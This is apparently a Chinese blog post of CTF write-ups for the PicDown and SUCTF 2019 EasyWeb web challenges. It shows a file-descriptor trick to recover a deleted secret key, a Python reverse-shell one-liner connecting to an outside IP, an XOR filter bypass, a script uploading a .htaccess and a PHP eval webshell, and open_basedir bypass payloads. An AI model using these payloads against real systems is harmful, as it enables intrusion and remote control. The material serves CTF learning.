一天一道ctf 第57天(文件描述符 反弹shell)

最新推荐文章于 2022-12-27 15:01:58 发布
最新推荐文章于 2022-12-27 15:01:58 发布
阅读量647 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119798951
版权

[网鼎杯 2020 白虎组]PicDown
这题目还挺怪的,?url=/flag直接读取是非预期解
在这里插入图片描述
正常一步一步做下来是先看/proc/self/cmdline,查看本地使用过的命令,然后/proc/self/cwd/app.py看源码
在这里插入图片描述
在这里插入图片描述

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

可以看到要开启shell必须获得key,SECRET_FILE虽然已经被删除了,但它曾经用open打开过,所以会留下文件描述符。fd0,fd1,fd2分别是标准错误,输入和输出,所以fd3是第一个打开的文件。获得key=36RX8pbMxCr5trE1ze27R36lMZC7yNe+9SzHmeLLvyI=
在这里插入图片描述
然后用python反弹shell,key当中如果有加号要url编码,shell要url全编码。这里贴一个其他人写的全编码脚本,其实挺简单但就是懒得自己写
https://blog.csdn.net/qq_31129545/article/details/101208047

/no_one_know_the_manager?key=wFeb9OKKCk0+atCP25JpD+ImwSgbn3Ezc7poSH/0slk=&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.234.129",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

[SUCTF 2019]EasyWeb

非预期解,phpinfo里放了flag,用异或拼接出GET_绕过preg_match就能查看phpinfo了。这里用了很多一样的字符是因为对字符种类也做了限制。

?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=phpinfo

在这里插入图片描述
在这里插入图片描述
顺便看下过滤的函数,php版本是7.2。这道题的预期解用到的知识点比较多,这里我参考博客https://blog.csdn.net/qq_42967398/article/details/105615235
先利用get_the_flag()函数进行文件上传,脚本如下:

import requests
import base64

htaccess = b"""
#define width 1337
#define height 1337 
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://d835111d-13e6-4cee-9d5b-70556e858bee.node4.buuoj.cn:81//?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"

files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

在这里插入图片描述
确定了上传文件路径以后要绕过open_basedir,payload如下,具体原理我也不是很懂,只知道这样能成功绕过。扫目录找到文件THis_ls_tHe_F14g,再读取一下万事大吉。

http://d835111d-13e6-4cee-9d5b-70556e858bee.node4.buuoj.cn:81/upload/tmp_e80fe91c627250f70f0fca288165cfae/shell.ahhh?cmd=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);var_dump(scandir(%22/%22));

在这里插入图片描述

http://d835111d-13e6-4cee-9d5b-70556e858bee.node4.buuoj.cn:81/upload/tmp_e80fe91c627250f70f0fca288165cfae/shell.ahhh?cmd=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);echo(file_get_contents(%27/THis_Is_tHe_F14g%27));
scrawman
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BJDCTF 2nd]duangShell反弹shell,swp泄露)
xlcvv的博客
04-28 1572
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1580
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
linux下反弹shell
weixin_30904593的博客
04-02 310
01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波。 02 环境 win10 192.168.43.151 监听端 装有nc kali 192.168.253.128 反弹端 自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp|udp]/host...
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 320
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
SWPUCTF2019web题复现
bmth666的博客
04-05 1205
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
ctf-env:一套安装Shell脚本,用于为CTF创建环境
03-08
ctf-env 一套安装Shell脚本,用于为CTF创建环境。 :warning: 这些脚本可能会破坏您现有的环境 :warning: 强烈建议创建新环境并在其上运行这些脚本。 请使用vagrant up && vagrant ssh 。
对文件反转、倒置的工具,解决CTF和生活中的文件处理问题
最新发布
12-29
在网络安全和信息技术领域,尤其是参与CTF(Capture The Flag)竞赛的过程中,经常遇到需要处理和分析各种文件的情况。"对文件反转、倒置的工具"是这类问题的一个解决方案,它可以帮助参赛者或IT专业人士在解密、...
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
记录虎符杯线下决赛flask反序列化及patch思路
莫慌的博客
08-12 416
转载比较好的文章,提升对代码审计和反序列化渗透的思路
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2205
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
[网鼎杯 2020 白虎组]PicDown(任意文件读取)
qq_62046696的博客
12-27 465
打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后打不开只能用 010查看一下信息 看来是猜对了,然后 如果日记没删掉可以查看历史记录 .bash_history呃呃呃差不到,那就看一下现在的进程python 2的app.py文件,直接读取 源码出来了,解析一下 这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?后面这个3怎么来的呢,
[BUUCTF][网鼎杯 2020 白虎组]PicDown
cosmoslin的博客
01-24 1035
考点 文件读取 反弹shell 解题 在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取 获取启动指定进程的完整命令 /proc/self/cmdline 获得 python2 app.py 那么我们再读一下这个文件 /proc/self/cwd/app.py 得到 from flask import Flask, Response from flask import render_template from flask import request import os import u
[网鼎杯 2020 白虎组]PicDown
wuyaowangchuan的博客
03-08 1048
框框里面输入123 可以看到url变成了这样 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=123 试试 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node3.buuoj.cn/page?url=../../../../etc/passwd 存在任意文件下载 再猜猜这 http://59193e2f-62ad-4629-88b4-86b773d82d4e.node.
roarctf_2019_easyheap(文件描述符1关闭后仍然可以交互)
seaaseesa的博客
04-17 592
roarctf_2019_easyheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始的时候,我们可以在bss段输入一些数据,这意味着,我们可以在bss段伪造一个chunk show功能必须要满足条件才能使用 Free后没有清空指针,因此存在double free。 666功能也可以创建和free堆,但是有次数限制,但是这个次数限制也存在漏洞,即q...
Flask构建的HTTPSHTTP反向Shell
www_45zq_cn的博客
09-21 438
HRShell是一个使用Flask构建的高级HTTP(S)反向Shell,其兼容python 2.x/3.x并已在以下操作系统成功测试: Linux ubuntu 18.04 LTS macOS Mojave Windows 7/10 特性 隐秘性 TLS支持 1)使用即时证书或 2)通过指定证书/密钥对 客户端的代理支持。 目录导航(cd命令和变体)。 支持download/upload/...
一道ctf比赛web方向一道文件上传的题,并给出代码以及解决方法
03-05
我可以回答这个问题。一个例子是 PicoCTF 2018 的 "Super Secure File Upload Service" 题目。这是一个基于 Flask 的 web 应用程序,允许用户上传文件。但是,它有一个漏洞,可以让攻击者上传任意类型的文件,包括可执行文件。攻击者可以上传一个包含反向 shell 的可执行文件,然后在服务器上执行它,从而获得对服务器的控制。 以下是一个可能的解决方案: 1. 通过上传不同类型的文件来测试应用程序,以确定它是否允许上传可执行文件。 2. 如果应用程序允许上传可执行文件,则上传一个包含反向 shell 的可执行文件。 3. 在服务器上启动一个监听器,以便在攻击者连接时接受反向 shell。 4. 在攻击者连接到反向 shell 时,执行命令以获取对服务器的控制。 代码示例: ```python import requests url = "http://example.com/upload" files = {'file': open('reverse_shell.exe', 'rb')} response = requests.post(url, files=files) print(response.text) ``` 请注意,这只是一个示例,实际的攻击可能需要更多的技术和工具。此外,我强烈反对任何非法活动,包括黑客攻击和未经授权的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值